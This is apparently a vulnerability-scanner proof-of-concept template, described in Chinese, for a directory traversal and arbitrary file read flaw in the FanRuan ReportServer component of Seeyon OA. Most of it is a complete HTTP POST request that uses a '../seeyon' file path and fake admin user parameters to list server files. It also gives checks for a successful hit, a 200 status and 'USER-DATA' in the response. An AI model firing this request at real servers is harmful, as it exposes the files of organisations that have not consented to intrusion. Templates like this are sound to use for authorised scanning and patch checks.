<DudePoc_Name>致远 OA 帆软组件ReportServer目录遍历漏洞</DudePoc_Name>
<DudePoc_Description>2022攻防演习期间，致远OA被曝存在任意文件读取漏洞。</DudePoc_Description>
<DudePoc_SetHeader>
POST /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../seeyon&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>USER-DATA</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
